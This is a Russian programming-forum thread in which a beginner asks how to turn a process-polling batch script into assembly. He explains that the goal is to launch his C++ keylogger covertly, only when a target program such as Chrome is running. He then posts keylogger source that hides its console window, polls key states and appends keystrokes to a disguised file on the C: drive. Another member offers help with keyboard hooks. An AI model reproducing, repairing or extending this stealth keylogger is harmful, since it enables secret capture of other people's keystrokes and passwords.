Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Низкоуровневое программирование > Assembler - Ассемблер (FASM, MASM, WASM, NASM, GoASM, Gas, RosAsm, HLA) и не рекомендуем TASM
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 19.02.2012, 18:49   #1
stdio
Форумчанин
 
Аватар для stdio
 
Регистрация: 14.02.2012
Сообщений: 105
Вопрос Перевод бат файла на язык ассемблера

:test
tasklist | findstr /I *.* && goto go
timeout /T 3
goto test
:go
call notepad


Подскажите как можно перевести этот скрипт в ассемблерный листинг ?
Есть ли какой софт для этого?
stdio вне форума Ответить с цитированием
Старый 19.02.2012, 20:15   #2
rpy3uH
добрый няша
Старожил
 
Аватар для rpy3uH
 
Регистрация: 29.10.2006
Сообщений: 4,804
По умолчанию

только вручную
rpy3uH вне форума Ответить с цитированием
Старый 21.02.2012, 11:29   #3
alexcoder
Форумчанин
 
Регистрация: 31.05.2009
Сообщений: 786
По умолчанию

Каким-нибудь bat2exe и дизассемблером.
Помощь с программами:
vk.com/alexcoder1
e-mail: informatik101@mail.ru
alexcoder вне форума Ответить с цитированием
Старый 21.02.2012, 11:36   #4
Mikl___
Участник клуба
 
Регистрация: 11.01.2010
Сообщений: 1,162
По умолчанию

stdio
А может быть следует нормальными словами объяснить, ЧТО делает этот скрипт?
Mikl___ вне форума Ответить с цитированием
Старый 25.02.2012, 13:59   #5
stdio
Форумчанин
 
Аватар для stdio
 
Регистрация: 14.02.2012
Сообщений: 105
По умолчанию

вот что она делает, надеюсь описано нормальными словами .

:test // начало теста
tasklist | findstr /I chrome.exe && goto go // смотрим запущенные процессы, ищем
// к примеру chrome.exe
// если такой имеется переходим на go
timeout /T 3 // пауза на 3 сек(чтоб проц не пахал на 100%)
goto test // переходим на test
:go
call notepad //запускаем блокнот
stdio вне форума Ответить с цитированием
Старый 25.02.2012, 15:48   #6
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,792
По умолчанию

Цитата:
Подскажите как можно перевести этот скрипт в ассемблерный листинг ?
А зачем? Разве в пакетнике он плохо работает?
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 26.02.2012, 17:05   #7
stdio
Форумчанин
 
Аватар для stdio
 
Регистрация: 14.02.2012
Сообщений: 105
По умолчанию

я ни как не могу обуздать свой кейлоггер на С++(процессор работает на 100%, а в хуках на клавиатуру ни как не могу разобраться ), поэтому я решил написать батник который бы запускал кейлогер только когда запущен необходимый мне процесс.... Но не тут то было батник мой палит меня на тайм ауте(в открытую считает секунды(и не получается остаться скрытым). Вот я и решил как нибудь переделать батник в ассемблерный код и вставить его в кейлоггер написанный на С++)))))) вот такое вот кино.. Программировать начал два месяца назад( и ни одного языка программирования ещё толком ни знаю). Был бы очень благодарен если мне кто нибудь поможет разобраться с хуками на клавиатуру
stdio вне форума Ответить с цитированием
Старый 26.02.2012, 17:22   #8
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,792
По умолчанию

Цитата:
мне кто нибудь поможет разобраться с хуками на клавиатуру
Выкладывай наработки )
Там ничего сложного нет.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Старый 26.02.2012, 18:07   #9
stdio
Форумчанин
 
Аватар для stdio
 
Регистрация: 14.02.2012
Сообщений: 105
По умолчанию

изначальна был такой вариант( ни помню где усмотрел) но встречается часто в инете. У меня очень много на самом деле уже наработок с логгером(ни один не работает))))...

Код:
// loger.cpp: определяет точку входа для консольного приложения.
//

#include "stdafx.h"
#include<iostream>      
#include<windows.h>
#include<winuser.h>

using namespace std;



int S (int key, char *files)
{
    if ( (key == 1) || (key == 2) )
        return 0;
     FILE *Save;
    Save = fopen(files, "a+");
    cout << key << endl;
    fprintf(Save, "%s", &key);
fclose (Save);
    return 0;
}

void Hide()
{
  HWND Hide;
  AllocConsole();
  Hide = FindWindowA("ConsoleWindowClass", NULL);
  ShowWindow(Hide,0);
}

int main()
{
        Hide();
    char q;

    while (1)
    {
        for(q = 8; q <= 190; q++)
        {
		
if (GetAsyncKeyState(q) == -32767)
S (q,"C:\\sisstems.txt");

		}
    }
    
return 0;
}

Последний раз редактировалось Stilet; 26.02.2012 в 18:57.
stdio вне форума Ответить с цитированием
Старый 26.02.2012, 18:57   #10
Stilet
Белик Виталий :)
Старожил
 
Аватар для Stilet
 
Регистрация: 23.07.2007
Сообщений: 57,792
По умолчанию

Неудачный вариант. Грузный и к хукам никакого отношения не имеет.
I'm learning to live...
Stilet вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Перевод формул на язык програмирования (Pascal) spinogryz_ua Помощь студентам 7 16.01.2012 17:51
язык ассемблера nastya_m Помощь студентам 5 07.12.2011 13:15
Перевод программы на русский язык. shivo Фриланс 1 05.01.2011 15:20
помогите с написанием бат файла Aivar Помощь студентам 2 24.09.2008 22:58